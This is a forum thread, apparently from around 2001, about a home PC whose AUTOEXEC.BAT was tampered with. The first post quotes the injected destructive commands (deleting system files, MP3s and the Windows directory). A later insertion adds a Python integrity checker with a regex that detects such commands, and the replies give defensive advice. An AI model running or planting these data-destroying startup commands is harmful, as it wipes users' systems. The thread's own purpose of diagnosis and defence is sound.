Hacking through a firewall?

  1. #1
    Registered User
    Join Date
    Jan 2001
    Location
    Buffalo, NY
    Posts
    451

    Question Hacking through a firewall?

    I have an unusual situation.

    Have a friend that has internet access through cable. They use zonealarm for their firewall, Norton anti virus 2001 (updated very regularly) but they still have been 'hacked' several times.

    The most recent issue that happened, is their AUTOEXEC.BAT file was modified, with some really fun things added to it:

    YOU ARE F**KED!!! NEXT TIME SHARE!!!!!!

    echo off
    del c:\windows\system\*.exe
    del c:\windows\system\*.dll
    del *.mp3 /s
    deltree c:\windows


    Needless to say, they rebooted their computer for some reason, and it doesn't work too well anymore.

    All the exe and dll files were removed from windows\system, and as you can tell, it looks like there was an attempt to remove all mp3 files from the system, but it was done incorrectly, so it did not. We can still rescue all the mp3's. Then there was the attempt to remove the Windows directory entirely; fortunately they had the common sense to say "NO" when they were asked for permission to do that!

    Pretty basic, pretty slick, but HOW DID THIS HAPPEN?

    They are using napster of course, and they did stop several people from downloading from them the other day, but how was someone able to access the autoexec file and change it? They do not have ANY other filesharing type apps installed-- just napster.

    Also, no one there has the knowledge to do this on their own, and no one else has used their pc-- they have not had any floppies in etc.

    This is the 2nd time their autoexec has been 'hacked' - last time it was just a simple "format c:" attempt, but with no echo off, no switches, so they said 'no' and prevented disaster.... thing is, after that, I made the autoexec READ ONLY (it was still READ ONLY when I checked it...)

    (they also got a boot sector virus that norton detected but could not clean, i think they were running with the firewall down on that one....)

    Any ideas?
    The unbreakable toy is good for breaking other toys...

  2. #2
    Registered User
    Join Date
    Jan 2001
    Location
    Tampa, FL
    Posts
    188

    Post

    You sure it's not that MP3 virus? It sounds very similar. It is an 8041-byte MP3 file. It was talked about on TechTV a month or so ago.

  3. #3
    Registered User
    Join Date
    Jan 2001
    Location
    Buffalo, NY
    Posts
    451

    Post

    Anyone have any more info on that virus? I cannot find any information on it anywhere.....
    The unbreakable toy is good for breaking other toys...

  4. #4
    Registered User
    Join Date
    Feb 2001
    Location
    PA, USA
    Posts
    185

    Post

    Just because they have a firewall does not mean that they are protected. I personally do not like ZoneAlarm because you do not have enough control over it (well, at least the version I tried a while ago). Make sure you do not have any ports open to the public. Get a good firewall like AtGuard that allows rules for individual apps and ports. It also allows you to view active connections (so you can see when a hacker has connected to your machine).

    By the way, you are lucky that the people getting access to that machine are not real hackers. You can tell from their attempts that they are not very knowledgeable. A real hacker could have totally destroyed that machine (very easily, I might add).
    -=If at first you don't succeed... skydiving is not for you=-

    ¸,ø¤º°`°º¤ø,¸¸Sorry_I_Win,¸¸,ø¤º°`°º¤ø,¸

  5. #5
    Registered User tha 4NiK8R's Avatar
    Join Date
    Mar 2001
    Location
    Idaho
    Posts
    465

    Post

    With the boot sector virus you need to boot up with an anti-virus floppy disk. You can create one in Norton or download AVG (www.grisoft.com) and make one. For the hacked part: use a better firewall and make sure all ports are closed. You should also be running a more secure OS like Win2k so you have the added protection of NTFS, etc. I also prefer my system partition to be an odd letter (i.e. E) to keep out the newbie hackers. The only real way to keep people out of a system is to shut it off (hehe), but seriously, to keep the lamers out you just need to use the tools (firewall, NTFS, permissions, etc.) you have correctly.
    "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former."
    - Albert Einstein

  6. #6
    Registered User
    Join Date
    Jan 2001
    Location
    Buffalo, NY
    Posts
    451

    Post

    By the way, you are lucky that the people getting access to that machine are not real hackers. You can tell from their attempts that they are not very knowledgeable. A real hacker could have totally destroyed that machine (very easily, I might add).
    I AGREE!!! Even with a little surfing the internet they could come up with some more damaging things to do...

    As for ZoneAlarm, it does allow control of different apps, and I am wondering if, because they gave permission for Napster to use the internet both ways, this is where they are getting in? I must admit, I am not really knowledgeable on how all this is done. I really don't understand how someone was able to edit a read-only file!

    I would like to know how this was possible, mainly so I can do whatever I need to do to prevent it from happening again.......
    The unbreakable toy is good for breaking other toys...

  7. #7
    Registered User
    Join Date
    Jan 2001
    Location
    Buffalo, NY
    Posts
    451

    Post

    Originally posted by tha 4NiK8R:
    You should also be running a more secure OS like Win2k so you have the added protection of NTFS, etc.
    Yeah-- i thought of win2k for the NTFS-- thing is that it is a little too much for them, plus they are avid gamers.... have had too many people tell me that win2k is not the best for gaming....
    The unbreakable toy is good for breaking other toys...

  8. #8
    Registered User
    Join Date
    Feb 2001
    Location
    PA, USA
    Posts
    185

    Post

    Originally posted by joelen:
    i really don't understand how someone was able to edit a readonly file!

    I would like to know how this was possible, mainly so I can do whatever I need to do to prevent it from happening again.......
    It is quite easy to edit a read-only file. Remove read-only permission, edit the file then reset read-only.

    Simple DOS commands will do the trick:

    attrib c:\autoexec.bat -r -s -h
    edit c:\autoexec.bat
    attrib c:\autoexec.bat +r

    or from windows:

    right-click the file, go to Properties, uncheck Read-only
    -=If at first you don't succeed... skydiving is not for you=-

    ¸,ø¤º°`°º¤ø,¸¸Sorry_I_Win,¸¸,ø¤º°`°º¤ø,¸
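    Since the read-only attribute offers no real protection, detecting a change like this needs a comparison of file contents. As an added example (not code from any poster in the thread), a Python check that fingerprints a startup script against a known-good baseline, lists added lines and flags destructive commands; the baseline contents and the command list are assumptions, and the tampered sample is constructed from the lines quoted in the first post.

```python
"""Added example: baseline-integrity check for a DOS startup script such as AUTOEXEC.BAT.
Not taken from the thread; the baseline contents and the command list are assumptions."""
import hashlib
import re

# Commands that destroy data when they open a startup-script line (hypothetical list).
DESTRUCTIVE = re.compile(r"^\s*@?\s*(?:del|erase|deltree|format|fdisk|rd|rmdir)\b", re.I)


def sha256_hex(text: str) -> str:
    """Fingerprint of the file contents; record this for the known-good version."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def added_lines(baseline: str, current: str) -> list[str]:
    """Non-empty lines in the current file that were not in the baseline (order kept)."""
    known = {line.rstrip() for line in baseline.splitlines()}
    return [l.rstrip() for l in current.splitlines() if l.rstrip() and l.rstrip() not in known]


def check_startup_script(baseline: str, current: str) -> dict:
    """Compare the current file with the recorded baseline. The read-only attribute is
    not an access control (whoever can write the file can clear it), so rely on hashes."""
    added = added_lines(baseline, current)
    return {
        "modified": sha256_hex(current) != sha256_hex(baseline),
        "added": added,
        "destructive": [l for l in added if DESTRUCTIVE.match(l)],
    }


# Constructed sample input: an ordinary Win9x AUTOEXEC.BAT baseline...
BASELINE = (
    "@ECHO OFF\r\n"
    "SET PATH=C:\\WINDOWS;C:\\WINDOWS\\COMMAND\r\n"
    "SET TEMP=C:\\WINDOWS\\TEMP\r\n"
)
# ...and the same file with the lines quoted in the first post appended to it.
TAMPERED = BASELINE + (
    "YOU ARE F**KED!!! NEXT TIME SHARE!!!!!!\r\n"
    "echo off\r\n"
    "del c:\\windows\\system\\*.exe\r\n"
    "del c:\\windows\\system\\*.dll\r\n"
    "del *.mp3 /s\r\n"
    "deltree c:\\windows\r\n"
)

if __name__ == "__main__":
    report = check_startup_script(BASELINE, TAMPERED)
    print("modified:", report["modified"], "destructive lines:", report["destructive"])
```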

  9. #9
    Registered User MacGyver's Avatar
    Join Date
    Oct 2000
    Location
    Ottawa
    Posts
    4,232

    Post

    Have you checked their protocol bindings in Network properties? You can have all the protection you want, but if you have NetBEUI bound to your internet adapter, you're leaving the back door wide open. Go to www.grc.com and test the computer with ShieldsUP - this will let you know if there is something wrong right away.

    And as I always say, there is no substitute for regular backups, because you never know when something like this will happen.

  10. #10
    Registered User
    Join Date
    Jan 2001
    Location
    Gibraltar
    Posts
    156

    Post

    Originally posted by joelen:
    Yeah-- i thought of win2k for the NTFS-- thing is that it is a little too much for them, plus they are avid gamers.... have had too many people tell me that win2k is not the best for gaming....

    Although i don't run win2k at home (yet), I have heard several people say that it's better at OpenGL games than Win9x. He may have been wrong though. In fact, thinking about it, I'll just shut up now....
    Build a man a fire and he's warm for a day. Set a man on fire, and he's warm for the rest of his life.

  11. #11
    Registered User
    Join Date
    Jan 2001
    Location
    Buffalo, NY
    Posts
    451

    Post

    Originally posted by MacGyver:
    Have you checked their protocol bindings in Network properties?
    Only thing bound to the NIC is tcp/ip and client for ms networks...

    also: checked with grc.com running in 'stealth mode'

    Is it possible that allowing napster to share files is allowing full access to the system somehow?
    The unbreakable toy is good for breaking other toys...

  12. #12
    Registered User
    Join Date
    Mar 2001
    Location
    at my desk,usa
    Posts
    230

    Post

    ZoneAlarm asks if you want certain programs to act as a server. If yes was answered, there is an open port all the time the box is on. Open up ZoneAlarm and check to see if Napster is set as a server.
    Must not strangle users. Repeat. Must not strangle users.

  13. #13
    Registered User MacGyver's Avatar
    Join Date
    Oct 2000
    Location
    Ottawa
    Posts
    4,232

    Question

    Well, I have never used Napster so I wouldn't know. But I have used Gnotella and BearShare, and others are only able to download off you; they are not able to send any files to you. There may be an option somewhere in Napster that needs to be set properly. There may be viruses that spread through Napster; I know there are ones that spread through the Gnutella network. Do a file search on the PC for *.vbs, there may have been something come in through email that is haunting them....

  14. #14
    Registered User
    Join Date
    Mar 2001
    Location
    muskoka,ontario
    Posts
    385

    Post

    Originally posted by MacGyver:
    Do a file search on the PC for *.vbs, there may have been something come in through email that is haunting them....
    which is impossible for ppl who are running ME, because the search function does not seem to work!!!!!!!!!
    Duct tape is like the Force. It has a light side and a dark side, and it holds the universe together.


    [geek code]
    v3.12
    GCS
    d- s: a-- C++>$ US>$ UL>$ P+ L+ E--- W++>$ N K- w O---- PS PE Y+ t+ 5++ X R tv+ b+ DI+ D+ G e h-- r+ y++
    [/geek code]

  15. #15
    Registered User
    Join Date
    Oct 1999
    Location
    Clackamas, OR USA
    Posts
    5,422

    Post

    Originally posted by Imon Fyre:
    which is impossible for ppl who are running ME, because the search function does not seem to work!!!!!!!!!
    Double check your ME install. I've never seen your problem and just double checked on my own ME box over in the Tech Room--no problem...
    "Badges? We don't need no stinking badges."
